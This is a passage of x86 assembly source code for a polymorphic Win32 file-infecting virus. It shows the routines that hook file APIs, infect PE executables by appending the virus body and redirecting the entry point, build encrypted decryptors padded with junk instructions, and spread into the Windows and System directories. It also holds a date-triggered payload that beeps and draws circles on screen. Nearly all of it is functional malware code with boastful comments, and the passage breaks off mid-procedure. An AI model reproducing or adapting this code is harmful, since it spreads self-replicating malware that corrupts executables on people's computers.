;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
HookCopyFileA proc
pushad ; Save Registers
pushfd
mov ebp,00h ; Recuperate the Delta Offset
V_DeltaHook equ $-4
call BuscarArchivos ; And Find some Files in the actual Path
popfd
popad
push 5A5A5A5Ah ; Finaly jump to the real API
V_JumpHook equ $-4
ret
HookCopyFileA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Hook of CreateFileA API *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
HookCreateFileA proc
pushad ; Save Registers
pushfd
mov ebp,00h ; Recuperate the Delta Offset
call BuscarArchivos ; And Find some Files in the actual Path
popfd
popad
push 5A5A5A5Ah ; Finaly jump to the real API
ret
HookCreateFileA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Hook of DeleteFileA API *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
HookDeleteFileA proc
pushad ; Save Registers
pushfd
mov ebp,00h ; Recuperate the Delta Offset
call BuscarArchivos ; And Find some Files in the actual Path
popfd
popad
push 5A5A5A5Ah ; Finaly jump to the real API
ret
HookDeleteFileA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Hook of FindFirstFileA API *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
HookFindFirstFileA proc
pushad ; Save Registers
pushfd
mov ebp,00h ; Recuperate the Delta Offset
call BuscarArchivos ; And Find some Files in the actual Path
popfd
popad
push 5A5A5A5Ah ; Finaly jump to the real API
ret
HookFindFirstFileA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Hook of FindNextFileA API *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
HookFindNextFileA proc
pushad ; Save Registers
pushfd
mov ebp,00h ; Recuperate the Delta Offset
call BuscarArchivos ; And Find some Files in the actual Path
popfd
popad
push 5A5A5A5Ah ; Finaly jump to the real API
ret
HookFindNextFileA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Hook of GetModuleHandleA API *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
HookGetModuleHandleA proc
pushad ; Save Registers
pushfd
mov ebp,00h ; Recuperate the Delta Offset
call BuscarArchivos ; And Find some Files in the actual Path
popfd
popad
push 5A5A5A5Ah ; Finaly jump to the real API
ret
HookGetModuleHandleA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Hook of MoveFileA API *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
HookMoveFileA proc
pushad ; Save Registers
pushfd
mov ebp,00h ; Recuperate the Delta Offset
call BuscarArchivos ; And Find some Files in the actual Path
popfd
popad
push 5A5A5A5Ah ; Finaly jump to the real API
ret
HookMoveFileA endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Infect a New Host *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
InfectarArchivo proc
push edi ; Save registers
push esi
mov eax,[DatosArchivo.FileSizeLow+ebp] ; Add to File Size the Virus Size
mov esi,[DatosArchivo.FileSizeHigh+ebp] ; and Align it with Section Alignment
add eax,TamVirus@2
call AlinearCifra
mov ecx,75h ; Make the Mapping Size a multiple
xor edx,edx ; of 75h (Size Padding)
push eax
div ecx
pop eax
sub ecx,edx
add eax,ecx
mov edi,eax
mov [H_TamHostVirus+ebp],eax ; Save this Value
mov ebx,[H_HandleOpen+ebp]
call FileMapping ; And ReMap the File...
or eax,eax
jz InfectarArchivoError@1 ; Error... Truncate and Close File
mov [H_HandleMapa+ebp],eax
mov ebx,eax
call MapViewFile ; Create the extended File Mapping
or eax,eax
jz InfectarArchivoError@2
mov [@_DirArchivo+ebp],eax
call ModificarHostNuevo ; Change some headers values of
or eax,eax ; the New Host
jz InfectarArchivoError@3 ; If error Truncate and go out!
call CopiarHostNuevo ; Copy the Virus Body to New Host,
call EncriptarHostNuevo ; generate a new Decriptor and
mov esi,[@_DirArchivo+ebp] ; encript the Virus
call CheckSumValido ; If the Host had a CheckSum
or eax,eax ; go and recalculate it
jz InfectarArchivoError@4
mov ecx,[H_TamHostVirus+ebp]
call CheckSumMappedFile
InfectarArchivoError@4:
mov ebx,esi
call UnmapFile ; Unmap File, Close Handle...
mov eax,[H_HandleMapa+ebp] ; Well... the same stuff
call CloseHandleA
mov ebx,[H_TamHostVirus+ebp]
call TruncarHostNuevo
mov eax,[H_HandleOpen+ebp]
call CloseHandleB
pop esi
pop edi
xor eax,eax ; All terminated well -> eax non zero
inc eax
ret
InfectarArchivoError@3:
mov ebx,[@_DirArchivo+ebp] ; Unmap, Close, Truncate and Close...
call UnmapFile
InfectarArchivoError@2:
mov eax,[H_HandleMapa+ebp]
call CloseHandleA
mov ebx,[DatosArchivo.FileSizeLow+ebp]
call TruncarHostNuevo ; If we have an error, truncate the
InfectarArchivoError@1: ; New Host with his real size
mov eax,[H_HandleOpen+ebp]
call CloseHandleB
pop esi
pop edi
xor eax,eax ; The File have not been infected
ret
InfectarArchivo endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to start the Random Number Generator *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
IniciarSemilla proc
call [@_GetTickCount+ebp] ; The 1st time is a good initial value
mov [H_Semilla+ebp],eax ; Save it in a Virus place
ret
IniciarSemilla endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Load New Libraries *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
LoadLibrary proc
push esi
call [@_GetModuleHandleA+ebp] ; Get the Library Address if loaded yet
or eax,eax
jnz LoadLibrary@1
push esi
call [@_LoadLibraryA+ebp] ; If not loaded... we load it now!
LoadLibrary@1:
ret
LoadLibrary endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Load SfcIsFileProtected API *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
LoadSfcProtected proc
lea esi,[N_SfcLib+ebp]
call LoadLibrary ; Load Sfd.dll Library, please...
or eax,eax
jz LoadError@1
mov esi,eax
lea edi,[V_Nombres@5+ebp] ; APIs names and addresses
lea ebx,[V_Direcciones@5+ebp]
call FullApiAddress ; It's time to get some APIs, hahaha
or eax,eax
jz LoadError@1
ret
LoadError@1:
mov [@_SfcIsFileProtected+ebp],eax ; Save this address
ret
LoadSfcProtected endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Map a File in Memory *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
MapViewFile proc
xor eax,eax ; Just map the File that the Virus wants
push edi
push eax
push eax
push 000F001Fh ; With File Map All Access
push ebx
call [@_MapViewOfFile+ebp] ; Map view of New Host, please
ret
MapViewFile endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Set Some Host Header Values *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
ModificarHostNuevo proc
call CheckEntryPoint ; Check the Entry Point and save some values
or ecx,ecx
jz ModificarError@1 ; No good Host -> go out now
mov [H_RawText+ebp],ecx ; Save some addresses
mov [H_RvaText+ebp],ebx
mov [H_TextHeader+ebp],edx
mov edx,eax
add edx,[edx+3Ch] ; Time to find the last section of Host
mov esi,edx
add esi,18h
movzx ebx,word ptr[edx+14h]
add esi,ebx
movzx ecx,word ptr[edx+06h]
mov edi,esi
xor eax,eax
ModificarBucle@1:
cmp [edi+14h],eax
jna ModificarBucle@2
mov eax,[edi+14h] ; Get the actual last section
mov esi,edi
ModificarBucle@2:
add edi,28h
loop ModificarBucle@1
mov eax,[esi+24h]
and eax,10000000h ; Check for Shareable sections (we don't want)
jnz ModificarError@1
mov eax,[DatosArchivo.FileSizeLow+ebp]
mov ebx,eax
shr ebx,04h
sub eax,ebx
mov ebx,[esi+14h]
add ebx,[esi+10h]
sub eax,ebx
jnc ModificarError@1
mov eax,TamVirus@2
mov ebx,[esi+10h]
add eax,ebx
call AlinearCifra
mov [esi+10h],eax ; Set the Section Raw Data and Virtual Size
mov [esi+08h],eax
push ebx
call PonerDirectorio ; Actualice the Directory Structure
add ebx,[esi+0Ch]
mov eax,[edx+28h] ; whohoho... Set the new Entry Point, but
mov [H_RvaHost+ebp],eax ; make it point to the code section
mov [H_RvaVirus+ebp],ebx
call SetEntryPoint
add ebx,[edx+34h]
sub ebx,offset V_InicioVirus - offset V_InicioHost + 00401000h
mov [H_Delta+ebp],ebx ; Hard-Coded Delta offset
mov eax,[esi+10h]
add eax,[esi+0Ch]
mov [edx+50h],eax ; Set a new Size of Image
or [esi+24h],0E0000020h ; Make the last Section Writeable, Executable...
mov [edx+08h],'POLT' ; Put an Infection Mark in the Host Header
lea eax,[SysDate+ebp]
push eax
call [@_GetSystemTime+ebp] ; Get the Date of Infection
pop ebx
xor eax,eax ; Great! -> non zero eax
inc eax
ret
ModificarError@1:
xor eax,eax ; Shit!... don't infect it, zero eax
ret
ModificarHostNuevo endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to generate a new Decriptor *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
NuevoDesencriptar proc
push edi
call Random ; Get a new random Value
push eax
mov ebx,eax
and eax,00000007h ; Make it 0 to 7 to select a Decriptor
push eax
imul eax,eax,1Bh
lea esi,[V_Decriptores+ebp] ; And point to the selected Decriptor
add esi,eax
mov [esi+01h],ebx ; with his new 32 bits Key
add edi,offset V_Desencriptar - offset V_InicioVirus
mov ecx,17h ; Junk counter Instructions
lodsb ; Build a new Decriptor
stosb
lodsd
stosd
call PonerBasura ; Well... some Junk Instructions, please
lodsb ; And on, and on... the same
stosb
lodsd
stosd
call PonerBasura
lodsw
stosw
lodsd
stosd
call PonerBasura
push edi ; Save the jump loop direction for later
lodsw
stosw
call PonerBasura
lodsw
stosw
call PonerBasura
lodsb
stosb
call PonerBasura
lodsw
stosw
lodsb
stosb
call PonerBasura
call RellenarBasura ; If we have more space... fill in whit junk
lodsb
stosb
lodsw
pop edx
sub edx,edi
dec edx
dec edx
mov ah,dl
stosw ; And code the last jump with his address
pop eax
pop ecx
pop edi
ret
NuevoDesencriptar endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to calculate a New Partial CheckSum *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
ParcialCheckSum proc
push esi ; This is a version of the CheckSumMappedFile
xor eax,eax ; API... to make a CRC32 of Infected Files
shl ecx,01h ; Only makes the partial Check Sum, used by
je Check@0 ; other process that calculate the final
test esi,02h ; Check Sum of Mapped File
je Check@1
movzx edx,word ptr[esi]
add eax,edx
adc eax,00h
add esi,02h
sub ecx,02h
Check@1:
mov edx,ecx
and edx,07h
sub ecx,edx
je Check@2
test ecx,08h
je Check@3
add eax,[esi]
adc eax,[esi+04h]
adc eax,00h
add esi,08h
sub ecx,08h
je Check@2
Check@3:
test ecx,10h
je Check@4
add eax,[esi]
adc eax,[esi+04h]
adc eax,[esi+08h]
adc eax,[esi+0Ch]
adc eax,00h
add esi,10h
sub ecx,10h
je Check@2
Check@4:
test ecx,20h
je Check@5
add eax,[esi]
adc eax,[esi+04h]
adc eax,[esi+08h]
adc eax,[esi+0Ch]
adc eax,[esi+10h]
adc eax,[esi+14h]
adc eax,[esi+18h]
adc eax,[esi+1Ch]
adc eax,00h
add esi,20h
sub ecx,20h
je Check@2
Check@5:
test ecx,40h
je Check@6
add eax,[esi]
adc eax,[esi+04h]
adc eax,[esi+08h]
adc eax,[esi+0Ch]
adc eax,[esi+10h]
adc eax,[esi+14h]
adc eax,[esi+18h]
adc eax,[esi+1Ch]
adc eax,[esi+20h]
adc eax,[esi+24h]
adc eax,[esi+28h]
adc eax,[esi+2Ch]
adc eax,[esi+30h]
adc eax,[esi+34h]
adc eax,[esi+38h]
adc eax,[esi+3Ch]
adc eax,00h
add esi,40h
sub ecx,40h
je Check@2
Check@6:
add eax,[esi]
adc eax,[esi+04h]
adc eax,[esi+08h]
adc eax,[esi+0Ch]
adc eax,[esi+10h]
adc eax,[esi+14h]
adc eax,[esi+18h]
adc eax,[esi+1Ch]
adc eax,[esi+20h]
adc eax,[esi+24h]
adc eax,[esi+28h]
adc eax,[esi+2Ch]
adc eax,[esi+30h]
adc eax,[esi+34h]
adc eax,[esi+38h]
adc eax,[esi+3Ch]
adc eax,[esi+40h]
adc eax,[esi+44h]
adc eax,[esi+48h]
adc eax,[esi+4Ch]
adc eax,[esi+50h]
adc eax,[esi+54h]
adc eax,[esi+58h]
adc eax,[esi+5Ch]
adc eax,[esi+60h]
adc eax,[esi+64h]
adc eax,[esi+68h]
adc eax,[esi+6Ch]
adc eax,[esi+70h]
adc eax,[esi+74h]
adc eax,[esi+78h]
adc eax,[esi+7Ch]
adc eax,00h
add esi,80h
sub ecx,80h
jne Check@6
Check@2:
test edx,edx
je Check@0
Check@7:
movzx ecx,word ptr[esi]
add eax,ecx
adc eax,00h
add esi,02h
sub edx,02h
jne Check@7
Check@0:
mov edx,eax
shr edx,10h
and eax,0000FFFFh
add eax,edx
mov edx,eax
shr edx,10h
add eax,edx
and eax,0000FFFFh
pop esi
ret
ParcialCheckSum endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Virus Graphic Payload *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
Payload proc
xor eax,eax ; Get the Screen Handle
push eax
call [@_GetDC+ebp]
or eax,eax
jz PayloadError@1 ; If error -> Skip it!
mov [H_HandlePantalla+ebp],eax ; And save it...
mov edi,0320h ; Optimize to 800 per 600 screens
mov esi,0258h
mov ebx,07h ; Number of Rare Spots ;)
PayloadBucle@1:
call Random ; Create a Brush with a random color
and eax,00FFFFFFh
push eax
call [@_CreateSolidBrush+ebp]
push eax
push dword ptr[H_HandlePantalla+ebp]
call [@_SelectObject+ebp] ; And select it to paint...hahaha
call RunBeep ; whooaaa, wake up with the speaker!!
push ebx
mov eax,esi
call GetRndRange ; Get a random position (x,y)
mov ebx,eax ; in the actual screen (800,600)
mov eax,edi
call GetRndRange
mov ecx,eax
mov edx,ebx
push esi
mov esi,25h ; Build the area of Circle
add edx,esi
add ecx,esi
sub ebx,esi
sub eax,esi
pop esi
push edx ; Push the values
push ecx
push ebx
push eax
push dword ptr[H_HandlePantalla+ebp]
call [@_Ellipse+ebp] ; Draw a circle on the screen
pop ebx
dec ebx
jnz PayloadBucle@1 ; And go on... we want more circles!
PayloadError@1:
ret
Payload endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Virus Payload Test *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
PayloadVirus proc
lea eax,[SysDate+ebp] ; Push a pointer to a structure
push eax
call [@_GetSystemTime+ebp] ; And get the system Time
or eax,eax
jz PayloadVirusError@1
cmp word ptr[SysDate.Dia+ebp],1Fh ; If 31th of actual month
jnz PayloadVirusError@1
cmp word ptr[SysDate.Mes+ebp],5A5Ah ; And different than the infection
V_MesVirus equ $-2 ; month Date Mark
jz PayloadVirusError@1
call RunPayload ; Make a presentation (hahaha XD)
PayloadVirusError@1:
ret
PayloadVirus endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to put some shit instructions in Decriptor *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
PonerBasura proc
or ecx,ecx ; Check for counter, if zero...finish
jz PonerBasuraError@1
call Random ; get a random number
mov edx,eax
cmp ecx,03h ; At least 3 bytes in counter
jc PonerBasura@1
bt edx,00h ; And random please
jnc PonerBasura@1 ; We could put a 3 byte instruction
lea ebx,[V_TresBytes+ebp]
movzx eax,dl
and al,1Fh
mov dl,al
shl al,01h
add al,dl
add ebx,eax
mov ax,[ebx]
stosw
mov al,[ebx+02h]
stosb ; Great!... put the instruction
dec ecx ; Decrement counter
dec ecx
dec ecx
PonerBasura@1:
cmp ecx,02h ; At least 2 bytes in counter
jc PonerBasura@2
bt edx,08h ; And random please
jnc PonerBasura@2 ; Or a 2 byte junk instruction
lea ebx,[V_DosBytes+ebp]
movzx eax,dh
and al,1Fh
shl al,01h
add ebx,eax
mov ax,[ebx]
stosw ; Put the instruction
dec ecx ; Decrement counter
dec ecx
PonerBasura@2:
cmp ecx,01h ; At least one byte in counter
jc PonerBasuraError@1
bt edx,10h ; We want a random form
jnc PonerBasuraError@1 ; Or a 1 byte junk instruction
lea ebx,[V_UnByte+ebp]
shr edx,10h
and dx,000Fh
add ebx,edx
mov al,[ebx]
stosb ; Storage it!
dec ecx ; And decrement the counter
PonerBasuraError@1:
ret
PonerBasura endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Set the Directory Entry *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
PonerDirectorio proc
push ecx ; Save some registers
push ebx
mov edi,edx
add edi,78h ; Find the Directory address of infected File
mov ecx,[edx+74h]
Poner@2:
mov ebx,[edi] ; Get the variable that points to the last section
cmp ebx,[esi+0Ch] ; if exist...
jz Poner@1
add edi,08h
loop Poner@2
Poner@3:
pop ebx ; Finish!
pop ecx
ret
Poner@1:
add edi,04h ; ...And change it with the new values
mov [edi],eax
jmp Poner@3
PonerDirectorio endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to protect a Memory Section *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
ProtegerMemoria proc
lea eax,[H_Proteccion+ebp] ; Well, push the initial values
push eax ; of the block and Protect it
push dword ptr[InfoMemoria.Protect+ebp]
push dword ptr[InfoMemoria.RegionSize+ebp]
push dword ptr[InfoMemoria.BaseAddress+ebp]
call [@_VirtualProtect+ebp] ; Replace the real protection set
ret
ProtegerMemoria endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to generate a Random Number *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
Random proc
mov eax,[H_Semilla+ebp] ; Humm... a typical Random Number Generator
imul eax,eax,65h ; Take a seed and make another random number
add eax,0167h ; with this process
mov [H_Semilla+ebp],eax ; Save the random value
ret
Random endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to fill in with shit instructions the Decriptor *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
RellenarBasura proc
or ecx,ecx ; If counter is zero... finish it
jz RellenarError@1
Rellenar@1:
cmp ecx,03h ; If not... write 3 bytes instructions
jc Rellenar@2
call Random ; A random instruction
mov edx,eax
lea ebx,[V_TresBytes+ebp]
movzx eax,dl
and al,1Fh
mov dl,al
shl al,01h
add al,dl
add ebx,eax
mov ax,[ebx]
stosw ; Put the instruction in decriptor place
mov al,[ebx+02h]
stosb
dec ecx ; Decrement the counter
dec ecx
dec ecx
jmp Rellenar@1
Rellenar@2:
cmp ecx,02h ; Or 2 bytes instructions
jc Rellenar@3
call Random ; A random instruction
mov edx,eax
lea ebx,[V_DosBytes+ebp]
movzx eax,dl
and al,1Fh
shl al,01h
add ebx,eax
mov ax,[ebx]
stosw ; Storage it
dec ecx ; And decrement the counter
dec ecx
jmp Rellenar@2
Rellenar@3:
cmp ecx,01h ; Or 1 byte instructions
jc RellenarError@1
call Random ; We want a random one!
mov edx,eax
lea ebx,[V_UnByte+ebp]
movzx eax,dl
and al,0Fh
add ebx,eax
mov al,[ebx]
stosb ; Put it and decrement...
dec ecx
jmp Rellenar@3
RellenarError@1:
ret
RellenarBasura endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Payload Sound Loop *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
RunBeep proc
push ebx ; Hahaha... a simple loop efect with the Internal
push edi ; speaker (I guess everybody knows)
push esi
mov ebx,20h ; Loop Counter
mov edi,01F4h ; Initial frecuence
mov esi,19h ; Duration of Sound
RunBeepBucle@1:
push esi
push edi
call [@_Beep+ebp] ; Hahaha... (But don't work in win9x first editions)
add edi,64h ; Bring up frecuence...:P
dec ebx
jnz RunBeepBucle@1 ; And on, and on...
pop esi
pop edi
pop ebx
ret ; Return to caller process
RunBeep endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Load Libraries for Payload *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
RunPayload proc
lea esi,[N_UserLib+ebp] ; Try to load the User32.dll...
call LoadLibrary
or eax,eax
jz RunPayloadError@1 ; If error -> go out
mov esi,eax
lea edi,[V_Nombres@2+ebp] ; If not -> get all APIs needed
lea ebx,[V_Direcciones@2+ebp]
call FullApiAddress
or eax,eax
jz RunPayloadError@1
lea esi,[N_GdiLib+ebp] ; ... And the Gdi.dll Libraries
call LoadLibrary
or eax,eax
jz RunPayloadError@1
mov esi,eax
lea edi,[V_Nombres@3+ebp]
lea ebx,[V_Direcciones@3+ebp]
call FullApiAddress ; And get all APIs needed
or eax,eax
jz RunPayloadError@1
call Payload ; If no error -> Run Payload
RunPayloadError@1:
ret
RunPayload endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function Runtime Virus (Direct Action Part) *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
RuntimeVirus proc
lea eax,[BufferUno+ebp] ; Well, get the actual Path
push eax
push MAX_PATH
call [@_GetCurrentDirectoryA+ebp]
mov [H_NumLetrasA+ebp],eax ; Save Path Lenght
push MAX_PATH
lea eax,[BufferDos+ebp] ; Get the Windows Path
push eax
call [@_GetWindowsDirectoryA+ebp]
mov [H_NumLetrasB+ebp],eax ; Save Path Lenght
xor ecx,ecx
call SetBufferTres ; Set Buffer for SFC calls
call BuscarArchivos ; Time to find some Files... ;P
lea eax,[BufferDos+ebp]
push eax
call [@_SetCurrentDirectoryA+ebp] ; Move to Windows Directory
xor ecx,ecx
inc ecx
call SetBufferTres ; Set Buffer for SFC calls
call BuscarArchivos ; hahaha... more Files!!!
push MAX_PATH
lea eax,[BufferDos+ebp] ; Get the System Path
push eax
call [@_GetSystemDirectoryA+ebp]
mov [H_NumLetrasB+ebp],eax ; Save Path Lenght
lea eax,[BufferDos+ebp]
push eax
call [@_SetCurrentDirectoryA+ebp] ; Move to System Directory
xor ecx,ecx
inc ecx
call SetBufferTres ; Set Buffer for SFC calls
call BuscarArchivos ; Ufff... do you want more File?
lea eax,[BufferUno+ebp] ; Return to initial Host Path
push eax
call [@_SetCurrentDirectoryA+ebp]
ret
RuntimeVirus endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to Set all Resident Hooks *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
SetAllHooks proc
lea edi,[V_Direcciones@4+ebp] ; Get the APIs we wanna Hook
lea esi,[V_Offsets@1+ebp] ; And the offsets of Hooking Process
SetAll@1:
call SetHook ; And Make a little changes in Import Header!!!
or eax,eax
jz SetAllError@1 ; Hummm, API not found
call DesprotegerMemoria ; If Memory is protected... try to Unprotect
or eax,eax ; it first... whahaha
jz SetAllError@1
lodsd
add eax,ebp
mov [ebx],eax ; Make API reference point to our process
add eax,offset V_DeltaHook - offset HookCopyFileA
mov [eax],ebp
add eax,offset V_JumpHook - offset V_DeltaHook
mov ebx,[edi]
mov [eax],ebx
call ProtegerMemoria ; And Protect again the Memory Block
SetAll@2:
add edi,04h ; Well, the next one API
mov eax,[edi]
or eax,eax ; Is it the last one? No? go on
jnz SetAll@1
ret
SetAllError@1:
add esi,04h ; Great, the next offset
jmp SetAll@2
SetAllHooks endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to put a Path in Buffer *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
SetBufferTres proc
push esi ; Save some registers
push edi
or ecx,ecx ; Actual Path or Other?
jz SetBuffer@1
lea esi,[BufferDos+ebp] ; If Windows or System Path
mov ecx,[H_NumLetrasB+ebp] ; Set some values
jmp SetBuffer@2
SetBuffer@1:
lea esi,[BufferUno+ebp] ; If actual Path
mov ecx,[H_NumLetrasA+ebp] ; Set some values
SetBuffer@2:
lea edi,[BufferTres+ebp]
xor eax,eax
SetBuffer@3:
lodsb ; Make BufferTres with the actual Path, but
stosw ; in Unicode instead Ansi string
loop SetBuffer@3
xor eax,eax
stosw ; This is for a SfcIsFileProtected API
pop edi ; that needs absolute Paths in Unicode
pop esi
ret
SetBufferTres endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to write the Entry Point *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
SetEntryPoint proc
push esi ; Make the Enty Point Value point to the last
push ebx ; Code Section 6 bytes
lea esi,[V_EntryPoint+ebp]
mov eax,[H_RvaText+ebp]
mov [edx+28h],eax ; This is the new Entry Point... hahaha
add eax,05h
sub ebx,eax ; Path the relative call
mov [esi+01h],ebx
mov edi,[H_RawText+ebp] ; And Put there the relative call to the Virus
lodsb ; and some stuff
stosb
lodsd
stosd
lodsb
stosb
mov esi,[H_TextHeader+ebp] ; Actualice the Code Section Virtual Size
add dword ptr[esi+08h],06h
pop ebx
pop esi
ret ; Bye!
SetEntryPoint endp
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
;* Function to set the Re-Entry of Virus *
;**_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_*_-_***
SetReEntrada proc
lea esi,[V_ReEntrada+ebp] ; Because the virus have first the
lea edi,[V_Desencriptar+ebp] ; decritor routine... if the program
